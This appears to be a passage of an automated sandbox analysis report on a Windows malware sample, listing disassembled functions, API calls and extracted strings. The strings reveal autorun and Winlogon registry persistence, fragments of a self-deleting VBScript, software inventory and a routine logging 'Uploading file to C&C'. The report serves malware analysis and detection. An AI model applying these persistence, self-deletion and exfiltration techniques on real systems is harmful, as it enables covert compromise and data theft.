                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004079DF
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004079EC
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004079F8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407A01
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407A0A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407A13
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00407A27
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419BA0,004137F0), ref: 00407A2F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",00419BA0,00414294), ref: 00407A46
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00414294), ref: 00407A53
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00414294), ref: 00407A5F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00414294), ref: 00407A68
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00414294), ref: 00407A71
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00407A7F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407A8B
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00407A95
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407AA1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 00407ABA
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00407AC7
                                                • exit.MSVCRT ref: 00407ACE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@?c_str@?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$??0?$basic_string@$D@2@@std@@D@std@@V01@V10@Y?$basic_string@$G@1@@$FileTerminateV01@@V10@@$??9std@@AttributesD@1@@Thread$?length@?$basic_string@?size@?$basic_string@ExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                                • String ID: ")$C:\WINDOWS\system32\userinit.exe$EXEpath$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$\uninstall.vbs$explorer.exe$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                • API String ID: 357535342-2377545745
                                                • Opcode ID: 8e4ede0bd83c1d490560549dff18f7c85ac3cba2774f96d414c8b9e56eff4302
                                                • Instruction ID: f63d6aa835ee4dab972c5fe5023ef2924f9ab84ac1c1da1ebb1d2ac6b1838751
                                                • Opcode Fuzzy Hash: 8e4ede0bd83c1d490560549dff18f7c85ac3cba2774f96d414c8b9e56eff4302
                                                • Instruction Fuzzy Hash: 1FA166B19001097BDB00EBA0ED59EEF7B7CAB54306F1480BAF505A21D1DB785B89CB6D
                                                Function 00403695 Relevance: 93.1, APIs: 51, Strings: 2, Instructions: 314fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 744 403695-4036d0 call 401fc3 CreateFileW 747 4036d2-40370f ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 call 402049 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 744->747 748 403714-4037b9 GetFileSize call 402022 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z call 41135a ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 410cd2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 744->748 753 403a39-403a54 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 747->753 759 403a26-403a37 CloseHandle call 40207b 748->759 760 4037bf-4037c4 748->760 756 403a56-403a5a 753->756 759->753 761 4037c9-4037cc 760->761 763 4037de-403a00 ??2@YAPAXI@Z SetFilePointer ReadFile ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z call 41127d * 2 call 4113ba ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 12 call 402049 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 15 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 761->763 764 4037ce 761->764 776 403a02-403a20 call 4127a4 763->776 777 403a5d-403a8b call 40207b CloseHandle ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 763->777 766 4037d0-4037d6 764->766 767 4037d8-4037db 764->767 766->763 766->767 767->763 776->759 782 4037c6 776->782 777->756 782->761
                                                APIs
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004036C4
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 004036E8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000053,?,?,?,?,?,?), ref: 00403709
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 004036F2
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • GetFileSize.KERNEL32(00000000,?), ref: 0040371C
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 0040374B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 00403769
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 0040377A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040378B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00403794
                                                • ??2@YAPAXI@Z.MSVCRT(0000FDE8), ref: 004037E1
                                                • SetFilePointer.KERNEL32(?,?,?,?), ref: 004037F5
                                                • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403809
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403819
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040382F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A3C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A45
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A4E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$File$D@2@@0@G@2@@std@@G@std@@Hstd@@V?$basic_string@$D@1@@G@1@@V10@0@$??2@CreatePointerReadSizeV01@@V10@@socket
                                                • String ID: Uploading file to C&C: $[INFO]
                                                • API String ID: 534860933-3151135581
                                                • Opcode ID: 29b8a269fb9bf56a9e90319054afe079c84013b7625e06aa0f10233bc34decda
                                                • Instruction ID: 98c3deb803e71fa0886ad6ae057fd2c93e61dbf9a11ac3df4f9a8e9669eff77e
                                                • Opcode Fuzzy Hash: 29b8a269fb9bf56a9e90319054afe079c84013b7625e06aa0f10233bc34decda
                                                • Instruction Fuzzy Hash: 1BC1FA71C00109ABDF04EFA1DC49DEEBB78FF15305F1081AAF415A3191EA399B49CBA8
                                                Function 00411C60 Relevance: 86.0, APIs: 42, Strings: 7, Instructions: 239registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 900 411c60-411c88 RegOpenKeyExA 901 411ca4-411cd8 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z RegEnumKeyExA 900->901 902 411c8a-411c9f ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z 900->902 904 411cdd-411cdf 901->904 903 411f9c-411f9e 902->903 905 411ce5-411ce7 904->905 906 411f78-411f9b RegCloseKey ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 904->906 907 411f52-411f55 905->907 908 411ced-411d09 RegOpenKeyExA 905->908 906->903 909 411f5c-411f73 RegEnumKeyExA 907->909 908->909 910 411d0f-411d1a 908->910 909->904 911 411d1b call 40a972 910->911 912 411d20-411d2e 911->912 913 411d2f call 40a972 912->913 914 411d34-411d3f 913->914 915 411d40 call 40a972 914->915 916 411d45-411d50 915->916 917 411d51 call 40a972 916->917 918 411d56-411d61 917->918 919 411d62 call 40a972 918->919 920 411d67-411d72 919->920 921 411d73 call 40a972 920->921 922 411d78-411d86 ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ 921->922 923 411f10-411f4c RegCloseKey ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 6 922->923 924 411d8c-411f0a ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z * 2 ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 12 922->924 923->907 924->923
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00411C80
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 00411C96
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00411CB7
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00411CD6
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00411D01
                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00411D7E
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00414B94,?,00414B94,?,00414B94,?,00414B94,?,00414B94,?,00414B94,0041417C), ref: 00411DBE
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00414B94,0041417C), ref: 00411DCE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                • API String ID: 1820998543-3714951968
                                                • Opcode ID: 3a7fa71a5b00113178a47ffbaed4b7d14abce261d46f82509c17fe487a0f0748
                                                • Instruction ID: 52b6449ae2930170a8c194f549236c2453a2cf2de6ef20e039af0df2fb4576ac
                                                • Opcode Fuzzy Hash: 3a7fa71a5b00113178a47ffbaed4b7d14abce261d46f82509c17fe487a0f0748
                                                • Instruction Fuzzy Hash: 4491CCB2800119AFCF10EF90DD49EEFBB7CAF14305F1041A6B50AA2065EB745B99CF68
                                                Function 00409D77 Relevance: 80.8, APIs: 39, Strings: 7, Instructions: 275sleepsynchronizationstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,00419970,00419BC8,00000000), ref: 00409D8E
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00409DA1
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00409DAE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409DB7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000208,00000000), ref: 00409DD6
                                                  • Part of subcall function 0040A9EF: RegOpenKeyExA.ADVAPI32(80000001,00407880,00000000,00020019,00407880), ref: 0040AA09
                                                  • Part of subcall function 0040A9EF: RegQueryValueExA.ADVAPI32(00407880,?,00000000,00000000,?,?,00000208), ref: 0040AA25
                                                  • Part of subcall function 0040A9EF: RegCloseKey.ADVAPI32(00407880), ref: 0040AA30
                                                • exit.MSVCRT ref: 00409DF0
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409DFD
                                                • exit.MSVCRT ref: 00409E1A
                                                • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 00409E29
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00409E35
                                                • CloseHandle.KERNEL32(80000001), ref: 00409E3E
                                                • GetCurrentProcessId.KERNEL32 ref: 00409E44
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 00409E52
                                                • PathFileExistsW.SHLWAPI(?), ref: 00409E71
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00409E86
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409E90
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409ED4
                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00409EEF
                                                • lstrcatW.KERNEL32(?,.exe), ref: 00409F01
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00409F13
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409F1D
                                                  • Part of subcall function 004118F7: CreateFileW.KERNEL32(6C9BB310,40000000,00000000,00000000,00000002,00000080,00000000,004137F0,6C9BB310), ref: 00411934
                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00409F43
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C,80000001), ref: 00409F55
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C), ref: 00409F6F
                                                • Sleep.KERNEL32(000001F4), ref: 00409F86
                                                • exit.MSVCRT ref: 00409F9B
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419958,004137F0,00000000,80000001,00419970), ref: 00409FBD
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00409FE9
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409FF2
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000410,00000000), ref: 0040A00F
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040A033
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419958,004137F0), ref: 0040A043
                                                • Sleep.KERNEL32(00000BB8), ref: 0040A06A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A07E
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000000,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888,?,?,?,?,?,?,?,004074CA), ref: 00407139
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 00407143
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 00407163
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000000,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888,?,?,?,?,?,?,?,004074CA), ref: 0040717D
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 00407187
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 004071A7
                                                  • Part of subcall function 00407112: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(explorer.exe, ,?,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888), ref: 004071C9
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004074CA), ref: 004071D4
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(00000001,00000000), ref: 004071E1
                                                  • Part of subcall function 00407112: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004071EB
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040720D
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407216
                                                  • Part of subcall function 00407112: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040721F
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040A0AF
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A0B8
                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040A0C1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A0CE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000), ref: 0040A0DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@$G@2@@0@V?$basic_string@$Hstd@@$?size@?$basic_string@$??1?$basic_string@$FileV10@$exit$??0?$basic_string@??8std@@CloseCreateNameOpenPathProcessSleepTempV10@@$??4?$basic_string@CurrentD@1@@ExecuteExistsG@1@@HandleModuleMutexObjectQueryShellSingleV01@V10@0@ValueWaitlstrcat
                                                • String ID: .exe$EXEpath$WDH$open$temp_$|EA$)A
                                                • API String ID: 962817110-4292904181
                                                • Opcode ID: ae363eb5805153746dc6e3701de724b2a9df5dd02c84358422de401d41d0a7d0
                                                • Instruction ID: 474e15d3884933020acca0955f214181e6bead7d41bed0abb2de22d9c15f6354
                                                • Opcode Fuzzy Hash: ae363eb5805153746dc6e3701de724b2a9df5dd02c84358422de401d41d0a7d0
                                                • Instruction Fuzzy Hash: 3291B9B16002057BDB01AFA09C59FEF7B6CAB49706F0080BAF606E61D1DE785E85C76D
                                                Function 004090DB Relevance: 77.2, APIs: 39, Strings: 5, Instructions: 213processsynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00419958,00419BC8,00000000), ref: 004090F5
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004146C0), ref: 0040910A
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00409123
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040912D
                                                • Process32FirstW.KERNEL32(?,?), ref: 00409149
                                                • Process32NextW.KERNEL32(?,0000022C), ref: 00409158
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409178
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409187
